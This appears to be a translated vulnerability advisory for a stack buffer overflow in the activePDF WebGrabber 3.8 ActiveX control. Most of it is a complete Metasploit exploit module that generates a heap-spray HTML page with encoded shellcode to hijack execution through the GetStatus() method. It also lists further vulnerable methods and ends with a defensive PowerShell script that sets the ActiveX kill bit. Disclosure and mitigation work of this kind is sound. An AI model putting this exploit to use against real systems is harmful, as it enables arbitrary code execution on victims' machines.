ActivePDF WebGrabber APWebGrb.ocx GetStatus() Method Buffer Overflow Vulnerability
Source: vendor  Published: 2013-05-01 14:59:00
activePDF Server provides integrated PDF generation and dynamic PDF conversion for enterprise and web applications.
The GetStatus() method of activePDF WebGrabber 3.8 has a stack buffer overflow when it handles an overly long string; successful exploitation can lead to arbitrary code execution.
Affected systems:
activePDF activePDF 3.8
Test method:
Warning: the following program (method) may be offensive in nature and is provided for security research and teaching only. Users act at their own risk!
##
# $Id: activepdf_webgrabber.rb 10998 2010-11-11 22:43:22Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = LowRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'activePDF WebGrabber ActiveX Control Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When
				sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)
				an attacker may be able to execute arbitrary code. This control is not marked safe
				for scripting, so choose your attack vector accordingly.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'MC' ],
			'Version'        => '$Revision: 10998 $',
			'References'     =>
				[
					[ 'OSVDB', '64579'],
					[ 'URL', 'http://www.activepdf.com/products/serverproducts/webgrabber/' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC'              => 'process',
					'DisablePayloadHandler' => 'true',
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
				],
			'DisclosureDate' => 'Aug 26 2008',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
			], self.class)
	end

	def exploit
		# Encode the shellcode.
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Create some nops.
		nops = Rex::Text.to_unescape(make_nops(4))

		# Set the return.
		ret = Rex::Text.uri_encode([target.ret].pack('L'))

		# Randomize the javascript variable names.
		vname = rand_text_alpha(rand(100) + 1)
		var_i = rand_text_alpha(rand(30) + 2)
		rand1 = rand_text_alpha(rand(100) + 1)
		rand2 = rand_text_alpha(rand(100) + 1)
		rand3 = rand_text_alpha(rand(100) + 1)
		rand4 = rand_text_alpha(rand(100) + 1)
		rand5 = rand_text_alpha(rand(100) + 1)
		rand6 = rand_text_alpha(rand(100) + 1)
		rand7 = rand_text_alpha(rand(100) + 1)
		rand8 = rand_text_alpha(rand(100) + 1)

		content = %Q|<html>
<head>
<script>
try {
var #{vname} = new ActiveXObject('APWebGrabber.Object');
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 800; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.GetStatus(#{rand8},1);
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|

		content = Rex::Text.randomize_space(content)

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(content)
	end
end

=begin
Other methods that are vulnerable.

[id(0x00000050), helpstring("Clean up after a WWWPrint call.")]
void CleanUp(BSTR ServerIPAddress, long ServerPort);

[id(0x00000055)]
BSTR Wait(BSTR IPAddress, long PortNumber, short WaitTime, BSTR AcceptedCommands);

...and probably more.
=end
Solution:
Vendor patch:
activePDF
---------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:
http://www.activepdf.com/products/serverproducts/server/index.cfm
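As an added mitigation example (not part of the advisory and not activePDF's own guidance): until a vendor fix exists, Internet Explorer can be prevented from instantiating the control at all by setting its ActiveX kill bit. The script assumes the control is registered under the ProgID APWebGrabber.Object (the ProgID the module above instantiates) and must be run from an elevated PowerShell session.

```powershell
# Added example, not part of the advisory: set the Internet Explorer kill bit for
# the activePDF WebGrabber control so that web pages can no longer load it.
# Assumption: the control is registered under the ProgID 'APWebGrabber.Object'.
$progId = 'APWebGrabber.Object'

# Resolve ProgID -> CLSID from the standard COM registration under HKCR.
$clsidKey = "Registry::HKEY_CLASSES_ROOT\$progId\CLSID"
if (-not (Test-Path $clsidKey)) {
    Write-Warning "ProgID $progId is not registered on this host; nothing to do."
    return
}
$clsid = (Get-ItemProperty -Path $clsidKey).'(default)'
Write-Host "Resolved $progId to CLSID $clsid"

# Kill bit = 0x400 in 'Compatibility Flags' (KB240797). APWebGrb.ocx is a 32-bit
# control, so on 64-bit Windows the Wow6432Node view must be set as well.
$killBit = 0x400
$paths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
)

foreach ($p in $paths) {
    # Skip the Wow6432Node view on 32-bit Windows, where that hive branch does not exist.
    if (-not (Test-Path (Split-Path $p -Parent))) { continue }
    if (-not (Test-Path $p)) { New-Item -Path $p -Force | Out-Null }

    # OR the kill bit into any flags already present instead of overwriting them.
    $current = (Get-ItemProperty -Path $p -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    $new = ([int]$current) -bor $killBit
    Set-ItemProperty -Path $p -Name 'Compatibility Flags' -Value $new -Type DWord

    # Read back and verify the bit is actually set.
    $check = (Get-ItemProperty -Path $p -Name 'Compatibility Flags').'Compatibility Flags'
    if (($check -band $killBit) -eq $killBit) {
        Write-Host "Kill bit set: $p"
    } else {
        Write-Warning "Failed to set kill bit: $p"
    }
}
```

The kill bit only affects Internet Explorer and other hosts that honour ActiveX Compatibility flags; applications that instantiate the control directly are unaffected, so removing the control remains the complete fix.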
References:
http://osvdb.org/show/osvdb/64579